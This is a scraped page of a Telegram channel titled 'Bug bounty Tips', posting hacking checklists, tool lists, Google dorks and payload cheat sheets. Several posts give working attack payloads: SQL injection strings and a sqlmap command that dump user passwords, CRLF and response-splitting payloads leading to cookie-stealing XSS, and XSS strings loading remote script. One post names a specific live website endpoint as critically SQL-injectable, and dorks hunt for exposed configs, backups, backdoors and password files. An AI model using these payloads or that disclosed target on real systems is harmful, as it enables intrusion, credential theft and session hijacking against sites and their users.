bugbounty_tech | Unsorted

Telegram-канал bugbounty_tech - Bug bounty Tips

2209

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Subscribe to a channel

Bug bounty Tips

Cross Site Scripting Mindmap

Читать полностью…

Bug bounty Tips

#Tech_book
#cryptography
"Cryptography and Embedded Systems Security", 2024.

Читать полностью…

Bug bounty Tips

#exploit
"Find and exploit race condition bugs in modern JS engines".

Читать полностью…

Bug bounty Tips

SQL Injection Cheat Sheet 💉

🔖#infosec #cybersecurity #hacking #pentesting #security #sqli

Читать полностью…

Bug bounty Tips

Tool alert🚨👇

Steps to install autoip changer tool
.
.
✔️ Share It with Your Friends.
🔗 CHECKOUT THE LINK IN BIO
🔥 Don’t miss the HIGHLIGHTS
🤔 Any queries? Don’t hesitate to DM.
❤️ LIKE, COMMENT, SHARE and SAVE the post.

#RedTeam #InfoSec #CyberSecurity #EthicalHacking #KaliLinux #CyberSec #HackerLife #PenTesting

https://www.instagram.com/cipherops.tech/p/C-j99vdSeV5/?igsh=MTc4MmM1YmI2Ng==

Читать полностью…

Bug bounty Tips

How Hackers Perform Device Scans on a Network with Nmap

Posted by @TheGodEye

Читать полностью…

Bug bounty Tips

☄️Want to learn how to hack? First, you'll need to get a good grip on these basics:

✔️Networking: Figure out how computers talk to each other.
✔️Coding: Learn to build and break stuff with code.
✔️Linux: Master this operating system – it's a hacker's playground.

🛡The better you understand these, the faster you'll pick up hacking skills.

Читать полностью…

Bug bounty Tips

https://github.com/chrislockard/api_wordlist

Читать полностью…

Bug bounty Tips

Plaaning to do something in 2024

## Advanced Recon

- Advanced Recon
- Sniffing HTTP and HTTPS
- MITM

## Dorking

- SQL Injection
- XSS
- HTML Injection

## Pen Testing Tools and Techniques

- Burpsuite and Tools
- SSH Enumeration and Brute Forcing
- Buffer Overflow
- Active Directory Enumeration
- S3 Bucket Enumeration and Exploitation and more

Читать полностью…

Bug bounty Tips

⚠️New BBP Target⚠️
🚀https://security.embracecloud.nl/.well-known/security.txt

Читать полностью…

Bug bounty Tips

https://www.acfcs.org/acfcs-contributor-report-bitcoin-tracking-for-law-enforcement

Читать полностью…

Bug bounty Tips

malvinval/ssrf-to-server-takeover-poc-bug-bounty-writeup-82d6715e333d" rel="nofollow">https://medium.com/@malvinval/ssrf-to-server-takeover-poc-bug-bounty-writeup-82d6715e333d

Читать полностью…

Bug bounty Tips

https://x.com/Rhynorater/status/1699395452481769867?t=2qXY5Fp_LUUzf-S0Vxb5fA&s=35

Читать полностью…

Bug bounty Tips

pollution
Test f
or auto-binding
Test for Mass Assignment
Test for NULL/Invalid Session Cookie

[+] Denial of Service

Test for anti-automation
Test for account lockout
Test for HTTP protocol DoS
Test for SQL wildcard DoS

[+] Business Logic

Test for feature misuse
Test for lack of non-repudiation
Test for trust relationships
Test for integrity of data
Test segregation of duties

[+] Cryptography

Check if data which should be encrypted is not
Check for wrong algorithms usage depending on context
Check for weak algorithms usage
Check for proper use of salting
Check for randomness functions

[+] Risky Functionality - File Uploads

Test that acceptable file types are whitelisted
Test that file size limits, upload frequency and total file counts are defined and are enforced
Test that file contents match the defined file type
Test that all file uploads have Anti-Virus scanning in-place.
Test that unsafe filenames are sanitised
Test that uploaded files are not directly accessible within the web root
Test that uploaded files are not served on the same hostname/port
Test that files and other media are integrated with the authentication and authorisation schemas

[+] Risky Functionality - Card Payment

Test for known vulnerabilities and configuration issues on Web Server and Web Application
Test for default or guessable password
Test for non-production data in live environment, and vice-versa
Test for Injection vulnerabilities
Test for Buffer Overflows
Test for Insecure Cryptographic Storage
Test for Insufficient Transport Layer Protection
Test for Improper Error Handling
Test for all vulnerabilities with a CVSS v2 score > 4.0
Test for Authentication and Authorization issues
Test for CSRF

[+] HTML 5

Test Web Messaging
Test for Web Storage SQL injection
Check CORS implementation
Check Offline Web Application

Читать полностью…

Bug bounty Tips

[+] Union Based SQL Injection

' or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#


sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

Читать полностью…

Bug bounty Tips

LFI | RFI | Traversal Cheat Sheet 🔰

🔖#infosec #cybersecurity #hacking #pentesting #security

Читать полностью…

Bug bounty Tips

#Cyber_Education
Using SeTcbPrivilege for educational purposes
https://github.com/daem0nc0re/PrivFu/tree/main/PowerOfTcb

Читать полностью…

Bug bounty Tips

# Google Dorks Cli
# https://github.com/six2dez/degoogle_hunter
degoogle_hunter.sh company.com

# Google dorks helper
https://dorks.faisalahmed.me/

# Code share sites
site:http://ideone.com | site:http://codebeautify.org | site:http://codeshare.io | site:http://codepen.io | site:http://repl.it | site:http://jsfiddle.net "company"
# GitLab/GitHub/Bitbucket
site:github.com | site:gitlab.com | site:bitbucket.org "company"
# Stackoverflow
site:stackoverflow.com "target.com"
# Project management sites
site:http://trello.com | site:*.atlassian.net "company"
# Pastebin-like sites
site:http://justpaste.it | site:http://pastebin.com "company"
# Config files
site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:env | ext:ini
# Database files
site:target.com ext:sql | ext:dbf | ext:mdb
# Backup files
site:target.com ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup
# .git folder
inurl:"/.git" target.com -github
# Exposed documents
site:target.com ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv
# Other files
site:target.com intitle:index.of | ext:log | ext:php intitle:phpinfo "published by the PHP Group" | inurl:shell | inurl:backdoor | inurl:wso | inurl:cmd | shadow | passwd | boot.ini | inurl:backdoor | inurl:readme | inurl:license | inurl:install | inurl:setup | inurl:config | inurl:"/phpinfo.php" | inurl:".htaccess" | ext:swf
# SQL errors
site:target.com intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
# PHP errors
site:target.com "PHP Parse error" | "PHP Warning" | "PHP Error"
# Login pages
site:target.com inurl:signup | inurl:register | intitle:Signup
# Open redirects
site:target.com inurl:redir | inurl:url | inurl:redirect | inurl:return | inurl:src=http | inurl:r=http
# Apache Struts RCE
site:target.com ext:action | ext:struts | ext:do
# Search in pastebin
site:pastebin.com target.com
# Linkedin employees
site:linkedin.com employees target.com
# Wordpress files
site:target.com inurl:wp-content | inurl:wp-includes
# Subdomains
site:*.target.com
# Sub-subdomains
site:*.*.target.com
#Find S3 Buckets
site:.s3.amazonaws.com | site:http://storage.googleapis.com | site:http://amazonaws.com "target"
# Traefik
intitle:traefik inurl:8080/dashboard "target"
# Jenkins
intitle:"Dashboard [Jenkins]"

Читать полностью…

Bug bounty Tips

⚡️⚡️⚡️Bug Bounty Tip⚡️⚡️⚡️

🤡🤡New Google Dork: Have You Checked Linktr.ee?

🔼🔽It seems that many users unknowingly store confidential documents and access information on Linktr.ee.

💸💸💸Try using this dork:

site: linktr.ee + keyword


🫦🫦If something valuable is found and a bounty is scored, consider sharing the success! 😉

Читать полностью…

Bug bounty Tips

## CRLF Injection || HTTP Response Splitting

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;


Header-based test, site root

%
0d%0aheader:header
%0
aheader:header
%
0d
header:header
%2
3%
0dheader:header
%3f
%0
dheader:header

/%2
50a
header:header

/%25
250
aheader:header

/%%0a
0ah
eader:header

/%3f%0
dhe
ader:header

/%23%0d
hea
der:header

/%25%30a
hea
der:header

/%25%30%6
1he
ader:header

/%u000ahea
der
:header

CRLF chaine
d with Open Redirect server misconfiguration

_Note:_ This
sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

//www.google.c
om/%2f%2e%2e%0d%0aheader:header
/www.google.c
om
/%2e%2e%2f%0d%0aheader:header
/google.com/%2
F.
.%0d%0aheader:header

Twitter specif
ic CRLF by @filedescriptor

%E5%98%8A%E5%98%8
Dheader:header

CRLF Injection
to XSS

%0d%0aContent-Le
ng
th:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

Response splitti
ng on 302 Redirect, before Location header (Discovered in DoD)

%0d%0aContent-Type:
%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

Response splittin
g on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)

_No
te:_ xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

Читать полностью…

Bug bounty Tips

Sql Injection

HOST: cutm.ac.in
ENDPOINT: https://cutm.ac.in/payu/skill/index.php?id=1
SEVERITY: Critical
IMPACT: Critical

Читать полностью…

Bug bounty Tips

Hey Hackers !

PentestList is a fantastic resource for the cybersecurity and ethical hacking community!

Key Features of PentestList 🌟:

• Comprehensive Directory 📂
• Search & Filter 🔍
• Verified Listings ✅
• User Reviews & Ratings ⭐️
• Up-to-Date Information 🕒
• Easy Comparison ⚖️
• Resource Hub 🛠

PentestList is designed to be your go-to resource for finding the best penetration testing services and staying ahead in the cybersecurity world!

Go : https://pentestlist.com/

Читать полностью…

Bug bounty Tips

Starting with API testing

Читать полностью…

Bug bounty Tips

something is coming up guys,
check this out and let me know your thoughts

Читать полностью…

Bug bounty Tips

🔰 Updated Bug Bounty tool List!

dnscan https://github.com/rbsec/dnscan

Knockpy https://github.com/guelfoweb/knock

Sublist3r https://github.com/aboul3la/Sublist3r

massdns https://github.com/blechschmidt/massdns

nmap https://nmap.org

masscan https://github.com/robertdavidgraham/masscan

EyeWitness https://github.com/ChrisTruncer/EyeWitness

DirBuster https://sourceforge.net/projects/dirbuster/

dirsearch https://github.com/maurosoria/dirsearch

Gitrob https://github.com/michenriksen/gitrob

git-secrets https://github.com/awslabs/git-secrets

sandcastle https://github.com/yasinS/sandcastle

bucket_finder https://digi.ninja/projects/bucket_finder.php

GoogD0rker https://github.com/ZephrFish/GoogD0rker/

Wayback Machine https://web.archive.org

waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050

Sn1per https://github.com/1N3/Sn1per/

XRay https://github.com/evilsocket/xray

wfuzz https://github.com/xmendez/wfuzz/

patator https://github.com/lanjelot/patator

datasploit https://github.com/DataSploit/datasploit

hydra https://github.com/vanhauser-thc/thc-hydra

changeme https://github.com/ztgrace/changeme

MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/

Apktool https://github.com/iBotPeaches/Apktool

dex2jar https://sourceforge.net/projects/dex2jar/

sqlmap http://sqlmap.org/

oxml_xxe https://github.com/BuffaloWill/oxml_xxe/

XXE Injector https://github.com/enjoiz/XXEinjector

The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool

ground-control https://github.com/jobertabma/ground-control

ssrfDetector https://github.com/JacobReynolds/ssrfDetector

LFISuit https://github.com/D35m0nd142/LFISuite

GitTools https://github.com/internetwache/GitTools

dvcs-ripper https://github.com/kost/dvcs-ripper

tko-subs https://github.com/anshumanbh/tko-subs

HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer

Race the Web https://github.com/insp3ctre/race-the-web

ysoserial https://github.com/GoSecure/ysoserial

PHPGGC https://github.com/ambionics/phpggc

CORStest https://github.com/RUB-NDS/CORStest

Retire-js https://github.com/RetireJS/retire.js

getsploit https://github.com/vulnersCom/getsploit

Findsploit https://github.com/1N3/Findsploit

bfac https://github.com/mazen160/bfac

WPScan https://wpscan.org/

CMSMap https://github.com/Dionach/CMSmap

Amass https://github.com/OWASP/Amass

Extra Tools
http://projectdiscovery.io

Читать полностью…

Bug bounty Tips

/channel/boost/bugbounty_tech

Читать полностью…

Bug bounty Tips

Add 'app/config/config.local.neon' to the wordlist, and maybe you will get juicy data.

By:
@NoRed0x

#bugbountytips #bugbountytip

Читать полностью…

Bug bounty Tips

Hi everyone, I have recently found an interesting vulnerability which allowed me to get all the exposed log files that contains juicy information like hidden directories, credentials etc



Here's the methodology:

1. Did initial content discovery and found /system endpoint (It was giving 403 error)

2. Then i went to discover content inside the "/system" directory and found "/system/logs"

3. Finally, Got the log files!!!

Читать полностью…

Bug bounty Tips

OWASP CHECKLIST

[+] Information Gathering

Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
Perform Web Application Fingerprinting
Identify technologies used
Identify user roles
Identify application entry points
Identify client-side code
Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
Identify co-hosted and related applications
Identify all hostnames and ports
Identify third-party hosted content

[+] Configuration Management

Check for commonly used application and administrative URLs
Check for old, backup and unreferenced files
Check HTTP methods supported and Cross Site Tracing (XST)
Test file extensions handling
Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
Test for policies (e.g. Flash, Silverlight, robots)
Test for non-production data in live environment, and vice-versa
Check for sensitive data in client-side code (e.g. API keys, credentials)

[+] Secure Transmission

Check SSL Version, Algorithms, Key length
Check for Digital Certificate Validity (Duration, Signature and CN)
Check credentials only delivered over HTTPS
Check that the login form is delivered over HTTPS
Check session tokens only delivered over HTTPS
Check if HTTP Strict Transport Security (HSTS) in use

[+] Authentication

Test for user enumeration
Test for authentication bypass
Test for bruteforce protection
Test password quality rules
Test remember me functionality
Test for autocomplete on password forms/input
Test password reset and/or recovery
Test password change process
Test CAPTCHA
Test multi factor authentication
Test for logout functionality presence
Test for cache management on HTTP (eg Pragma, Expires, Max-age)
Test for default logins
Test for user-accessible authentication history
Test for out-of channel notification of account lockouts and successful password changes
Test for consistent authentication across applications with shared authentication schema / SSO

[+] Session Management

Establish how session management is handled in the application (eg, tokens in cookies, token in URL)
Check session tokens for cookie flags (httpOnly and secure)
Check session cookie scope (path and domain)
Check session cookie duration (expires and max-age)
Check session termination after a maximum lifetime
Check session termination after relative timeout
Check session termination after logout
Test to see if users can have multiple simultaneous sessions
Test session cookies for randomness
Confirm that new session tokens are issued on login, role change and logout
Test for consistent session management across applications with shared session management
Test for session puzzling
Test for CSRF and clickjacking

[+] Authorization

Test for path traversal
Test for bypassing authorization schema
Test for vertical Access control problems (a.k.a. Privilege Escalation)
Test for horizontal Access control problems (between two users at the same privilege level)
Test for missing authorization

[+] Data Validation

Test for Reflected Cross Site Scripting
Test for Stored Cross Site Scripting
Test for DOM based Cross Site Scripting
Test for Cross Site Flashing
Test for HTML Injection
Test for SQL Injection
Test for LDAP Injection
Test for ORM Injection
Test for XML Injection
Test for XXE Injection
Test for SSI Injection
Test for XPath Injection
Test for XQuery Injection
Test for IMAP/SMTP Injection
Test for Code Injection
Test for Expression Language Injection
Test for Command Injection
Test for Overflow (Stack, Heap and Integer)
Test for Format String
Test for incubated vulnerabilities
Test for HTTP Splitting/Smuggling
Test for HTTP Verb Tampering
Test for Open Redirection
Test for Local File Inclusion
Test for Remote File Inclusion
Compare client-side and server-side validation rules
Test for NoSQL injection
Test for HTTP parameter

Читать полностью…

Bug bounty Tips

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
<IMG SRC="javascript:alert('XSS');">

<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>

some of the top payloads which are used while practicing oscp

Читать полностью…
Subscribe to a channel